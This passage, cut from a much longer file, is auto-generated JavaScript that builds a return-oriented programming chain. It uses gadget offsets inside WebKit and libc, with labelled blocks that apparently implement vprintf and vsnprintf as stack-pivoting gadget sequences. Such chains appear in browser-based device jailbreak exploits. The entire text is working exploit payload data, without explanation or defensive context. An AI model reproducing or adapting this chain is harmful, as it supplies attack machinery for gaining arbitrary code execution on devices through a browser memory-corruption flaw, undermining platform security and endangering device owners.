webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+561688, //L12461
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L12461:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L12463:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+561880, //L12466
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+561896, //L12467
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+561848, //L12464
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+561864, //L12465
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L12464:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L12465:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L12466:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12467:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+561976, //L12468
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+561992, //L12469
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L12468:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12469:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+562104, //L12470
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+562136, //L12472
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+764760, //pop rsi
ropchain+562120, //L12471
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L12470:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L12471:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12472:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+562240, //L12473
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+562256, //L12474
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+568675 //pop r8
]);
//L12473:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12474:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+562376, //L12475
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+562360, //L12476
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+759608 //pop rax
]);
//L12476:
db([0, 0]); // 0x0
set_gadget(libc_base+782311,); //pop rsp
//L12475:
db([0, 0]); // 0x0
set_gadgets([
libc_base+764760, //pop rsi
ropchain+562464, //L12478
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+764760, //pop rsi
ropchain+562448, //L12477
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L12477:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12478:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+562568, //L12479
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+562584, //L12480
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+568675 //pop r8
]);
//L12479:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12480:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+562704, //L12481
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+562688, //L12482
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+759608 //pop rax
]);
//L12482:
db([0, 0]); // 0x0
set_gadget(libc_base+782311,); //pop rsp
//L12481:
db([0, 0]); // 0x0
//_vprintf_:
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+562776, //L12484
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
webkit_base+568675 //pop r8
]);
//L12484:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+562840, //L12486
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
webkit_base+568675 //pop r8
]);
//L12486:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+562912, //L12487
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L12487:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L12489:
db([24, 0]); // 0x18
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+563032, //L12492
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+563016, //L12490
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L12490:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L12492:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+563176, //L12495
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+563144, //L12493
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+563160, //L12494
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L12493:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L12494:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12495:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+563256, //L12496
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L12496:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L12498:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+563376, //L12501
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+563360, //L12499
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L12499:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L12501:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+563520, //L12504
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+563488, //L12502
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+563504, //L12503
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L12502:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L12503:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12504:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L12505:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L12506:
db([1, 0]); // 0x1
set_gadget(libc_base+763368,); //pop rcx
//L12507:
db([1, 0]); // 0x1
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+835093, //sub rax, rcx ; sbb rdx, rcx
libc_base+764760, //pop rsi
ropchain+563792, //L12509
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+563808, //L12510
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+563776, //L12508
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L12508:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L12509:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12510:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+563904, //L12512
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+563888, //L12511
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L12511:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12512:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+731401, //mov rax, r8
libc_base+764760, //pop rsi
ropchain+564000, //L12514
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+764760 //pop rsi
]);
//L12513:
db([4294967295, 4294967295]); // -0x1
set_gadget(libc_base+759608,); //pop rax
//L12514:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608, //pop rax
//L12515:
ropchain+167544, //__out_char
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608, //pop rax
//L12517:
ropchain+564160, //L12516
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+782311, //pop rsp
ropchain+317712, //__vsnprintf
//L12516:
libc_base+853989, //mov rax, rcx
libc_base+764760 //pop rsi
]);
db([4294967256, 4294967295]); // -0x28
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+564304, //L12519
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+564320, //L12520
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+564288, //L12518
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L12518:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L12519:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12520:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+564432, //L12521
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+564464, //L12523
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+764760, //pop rsi
ropchain+564448, //L12522
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L12521:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L12522:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12523:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+564568, //L12524
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+564584, //L12525
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+568675 //pop r8
]);
//L12524:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12525:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+564704, //L12526
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+564688, //L12527
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+759608 //pop rax
]);
//L12527:
db([0, 0]); // 0x0
set_gadget(libc_base+782311,); //pop rsp
//L12526:
db([0, 0]); // 0x0
set_gadgets([
libc_base+764760, //pop rsi
ropchain+564792, //L12529
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+764760, //pop rsi
ropchain+564776, //L12528
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L12528:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12529:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+564896, //L12530
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+564912, //L12531
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+568675 //pop r8
]);
//L12530:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12531:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+565032, //L12532
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+565016, //L12533
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+759608 //pop rax
]);
//L12533:
db([0, 0]); // 0x0
set_gadget(libc_base+782311,); //pop rsp
//L12532:
db([0, 0]); // 0x0
//_vsnprintf_:
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+565104, //L12535
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
webkit_base+568675 //pop r8
]);
//L12535:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+731401, //mov rax, r8
libc_base+764760, //pop rsi
ropchain+565200, //L12536
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+565232, //L12539
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+763368 //pop rcx
]);
//L12536:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L12538:
db([40, 0]); // 0x28
set_gadget(webkit_base+568675,); //pop r8
//L12539:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+565336, //L12542
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+565320, //L12540
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L12540:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L12542:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+565480, //L12545
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+565448, //L12543
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+565464, //L12544
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L12543:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L12544:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12545:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+565560, //L12546
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L12546:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L12548:
db([32, 0]); // 0x20
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+565680, //L12551
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+565664, //L12549
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L12549:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L12551:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+565824, //L12554
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+565792, //L12552
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+565808, //L12553
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L12552:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L12553:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12554:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+565904, //L12555
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L12555:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L12557:
db([24, 0]); // 0x18
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+566024, //L12560
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+566008, //L12558
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L12558:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L12560:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+566168, //L12563
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+566136, //L12561
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+566152, //L12562
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L12561:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L12562:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12563:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+566248, //L12564
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L12564:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L12566:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+566368, //L12569
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+566352, //L12567
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L12567:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L12569:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+566512, //L12572
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+566480, //L12570
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+566496, //L12571
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L12570:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L12571:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12572:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608, //pop rax
//L12573:
ropchain+161664, //__out_buffer
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608, //pop rax
//L12575:
ropchain+566664, //L12574
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+782311, //pop rsp
ropchain+317712, //__vsnprintf
//L12574:
libc_base+853989, //mov rax, rcx
libc_base+764760 //pop rsi
]);
db([4294967256, 4294967295]); // -0x28
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+566808, //L12577
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+566824, //L12578
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+566792, //L12576
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L12576:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L12577:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12578:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+566936, //L12579
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+566968, //L12581
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+764760, //pop rsi
ropchain+566952, //L12580
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L12579:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L12580:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12581:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+567072, //L12582
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+567088, //L12583
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+568675 //pop r8
]);
//L12582:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12583:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+567208, //L12584
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+567192, //L12585
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+759608 //pop rax
]);
//L12585:
db([0, 0]); // 0x0
set_gadget(libc_base+782311,); //pop rsp
//L12584:
db([0, 0]); // 0x0
set_gadgets([
libc_base+764760, //pop rsi
ropchain+567296, //L12587
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+764760, //pop rsi
ropchain+567280, //L12586
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L12586:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12587:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+567400, //L12588
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+567416, //L12589
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+568675 //pop r8
]);
//L12588:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12589:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+567536, //L12590
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+567520, //L12591
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+759608 //pop rax
]);
//L12591:
db([0, 0]); // 0x0
